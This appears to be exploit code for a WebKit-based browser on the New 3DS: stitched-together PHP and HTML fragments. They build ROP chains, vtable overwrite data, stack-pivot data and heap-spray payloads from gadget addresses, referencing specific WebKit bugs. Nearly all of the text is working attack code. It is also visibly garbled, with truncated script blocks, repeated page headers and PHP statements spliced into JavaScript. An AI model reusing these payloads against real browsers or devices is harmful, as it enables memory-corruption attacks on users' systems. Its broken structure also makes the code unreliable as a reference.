/**
 * Append one 32-bit word to the global $ROPCHAIN buffer.
 *
 * The output form is chosen by the global $generatebinrop flag: when it is 0
 * (or unset) the word is passed through genu32_unicode(), which is defined
 * outside this excerpt; otherwise it is emitted as raw bytes with pack('N'),
 * i.e. in big-endian byte order. Whether the reader of the binary form
 * expects that byte order is not visible here — confirm against the consumer.
 *
 * @param int $val the 32-bit value to append (left untyped on purpose: the
 *                 file does not declare strict_types and callers may pass
 *                 numeric strings or floats)
 */
function ropchain_appendu32($val)
{
    global $ROPCHAIN, $generatebinrop;

    // Loose comparison is intentional: a null/unset flag also selects the
    // unicode-escaped form, exactly as the original `== 0` test did.
    $encoded = $generatebinrop == 0
        ? genu32_unicode($val)
        : pack("N*", $val);

    $ROPCHAIN .= $encoded;
}
// Build $OBJECTDATA_OVERWRITE: 0x7c bytes (31 words) rendered through
// genu32_unicode() (defined outside this excerpt) and wrapped in literal
// double quotes, presumably for embedding in the script below. Word 0 is
// $VTABLEPTR; each following word follows a 3-entry cycle driven by
// $loopcnt: $STACKPTR_ADR, $POPPC, $POPPC. The address globals are set
// earlier in the file and are not visible here.
// (In the collapsed paste the trailing `//` comments swallowed the rest of the
// line; the statements are restored one per line here, tokens unchanged.)
$OBJECTDATA_OVERWRITE = "\"";
$loopcnt = 0;
for ($i = 0; $i < 0x7c; $i += 4) {
    if ($i == 0) {
        $OBJECTDATA_OVERWRITE .= genu32_unicode($VTABLEPTR);
    } else {
        if ($loopcnt == 0) { $OBJECTDATA_OVERWRITE .= genu32_unicode($STACKPTR_ADR); } //stack ptr
        if ($loopcnt == 1) { $OBJECTDATA_OVERWRITE .= genu32_unicode($POPPC); } //lr, and in some cases pc.
        if ($loopcnt == 2) { $OBJECTDATA_OVERWRITE .= genu32_unicode($POPPC); } //pc
        $loopcnt++;
        // Wrap the 3-state counter so the pattern repeats.
        if ($loopcnt > 2) { $loopcnt = 0; }
    }
}
$OBJECTDATA_OVERWRITE .= "\"";
generate_ropchain();
?>
<!DOCTYPE html>
<body>
<script>
var form1;
} // closes a construct that begins before this excerpt
$OBJECTDATA_OVERWRITE .= "\"";
// Earlier hard-coded variant of the overwrite string, kept by the author:
//$OBJECTDATA_OVERWRITE = "\"\u6004\u08b6\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\u5804\u08b7\u6004\u08b6\u5e7c\u0098\"";
generate_ropchain();
// 32-byte raw SHA-256 of the path under which this script was requested
// (set by the web server). It is only used as a tag embedded twice in the
// padding below.
$tag = hash("sha256", $_SERVER['SCRIPT_NAME'], true);
// $OBJECTDATA_PADDING: five filler words, then the tag words twice, then a
// final filler word; wrapped in literal double quotes like the other strings.
$OBJECTDATA_PADDING = "\"" . genu32_unicode(0xf7f7f7f0);
$OBJECTDATA_PADDING .= genu32_unicode(0xf7f7f7f7);
$OBJECTDATA_PADDING .= genu32_unicode(0xf7f7f7f7);
$OBJECTDATA_PADDING .= genu32_unicode(0xf7f7f7f7);
$OBJECTDATA_PADDING .= genu32_unicode(0xf7f7f7f7);
for ($i = 0; $i < 2; $i++) {
    // Compose each word from four digest bytes, low byte first (`<<` binds
    // tighter than `|`, so the shifts apply before the OR).
    // NOTE(review): the top byte reuses $tag[$hashi + 1] instead of
    // $tag[$hashi + 3], so the packed words do not reproduce the digest
    // bytes. Whatever consumes this tag must expect the same layout — confirm
    // before changing either side. The same expression appears in the
    // $VTABLEDATA loop further down.
    for ($hashi = 0; $hashi < 0x20; $hashi += 4) {
        $OBJECTDATA_PADDING .= genu32_unicode(ord($tag[$hashi]) | ord($tag[$hashi + 1]) << 8 | ord($tag[$hashi + 2]) << 16 | ord($tag[$hashi + 1]) << 24);
    }
}
$OBJECTDATA_PADDING .= genu32_unicode(0xf4f7f7f7) . "\"";
?>
<html>
<head>
<script language="JavaScript">
//http://trac.webkit.org/changeset/158724
var haxstr0 = new Array();
var haxstr1 = new Array();
var longobjstr = "";
obj = new Array();
function create_input() {
for(i=0; i<0x1000; i++) {
$i += 3; // tail of two loops that begin before this excerpt
}
}
$STACKPIVOTDATA .= genu32_unicode($STACKPTR_ADR); //padding
$STACKPIVOTDATA .= "\"";
generate_ropchain();
// $VTABLEDATA: (0x110 - 0x20) >> 2 = 0x3c copies of $STACKPIVOTDATA_ADR
// (operator precedence: `-` before `>>`, and `>>` before `<`), followed by
// the eight tag words and then $VTABLE_JUMPADR. All three address globals
// are defined outside this excerpt.
$VTABLEDATA = "\"";
for ($i = 0; $i < 0x110 - 0x20 >> 2; $i++) {
    $VTABLEDATA .= genu32_unicode($STACKPIVOTDATA_ADR);
}
// 32-byte raw SHA-256 of the path under which this script was requested
// (set by the web server); used only as an embedded tag.
$tag = hash("sha256", $_SERVER['SCRIPT_NAME'], true);
// NOTE(review): the top byte reads $tag[$hashi + 1] a second time rather than
// $tag[$hashi + 3], so the packed word is not the raw digest. Confirm what the
// consumer expects before changing this.
for ($hashi = 0; $hashi < 0x20; $hashi += 4) {
    $VTABLEDATA .= genu32_unicode(ord($tag[$hashi]) | ord($tag[$hashi + 1]) << 8 | ord($tag[$hashi + 2]) << 16 | ord($tag[$hashi + 1]) << 24);
}
$VTABLEDATA .= genu32_unicode($VTABLE_JUMPADR);
$VTABLEDATA .= "\"";
?>
<html>
<head>
<style>
body {color:blue;background:black;}
iframe {display:none;}
h1 {text-align:center;}
</style>
<script>
//This haxx is only for the new3ds browser atm, based on this: http://pastebin.com/ufBCQKda
heapsetup();
if(parent==window) {
} // closes a construct that begins before this excerpt
$OBJECTDATA_OVERWRITE .= "\"";
// $OBJDATAPAYLOAD: 0x8000 bytes built as 0x200 repeats of one 0x40-byte
// block. $j is never read inside the loops, so every block is identical.
// Word layout within a block, by byte offset:
//   0x00 and 0x3c -> $POPPC
//   0x04..0x30    -> $VTABLEPTR
//   0x34          -> $OBJDATAPAYLOAD_ADDR + 4
//   0x38          -> $STACKPTR_ADR
// All address globals are defined outside this excerpt.
$OBJDATAPAYLOAD = "\"";
for ($j = 0; $j < 0x8000; $j += 0x40) {
    for ($i = 0; $i < 0x40; $i += 4) {
        if ($i == 0x34) {
            $OBJDATAPAYLOAD .= genu32_unicode($OBJDATAPAYLOAD_ADDR + 4); //Addr of the object used when doing the vtable funcptr call with vtable +0x5c.
        } else {
            if ($i < 0x34 && $i != 0x0) {
                $OBJDATAPAYLOAD .= genu32_unicode($VTABLEPTR);
            } else {
                if ($i == 0x38) {
                    $OBJDATAPAYLOAD .= genu32_unicode($STACKPTR_ADR);
                } else {
                    // Reached for offsets 0x00 and 0x3c.
                    $OBJDATAPAYLOAD .= genu32_unicode($POPPC);
                }
            }
        }
    }
}
$OBJDATAPAYLOAD .= "\"";
generate_ropchain();
?>
<!DOCTYPE html>
<html>
<body><div><script>
//https://trac.webkit.org/changeset/106972
obj = new Array();
objdatapayload = new Array();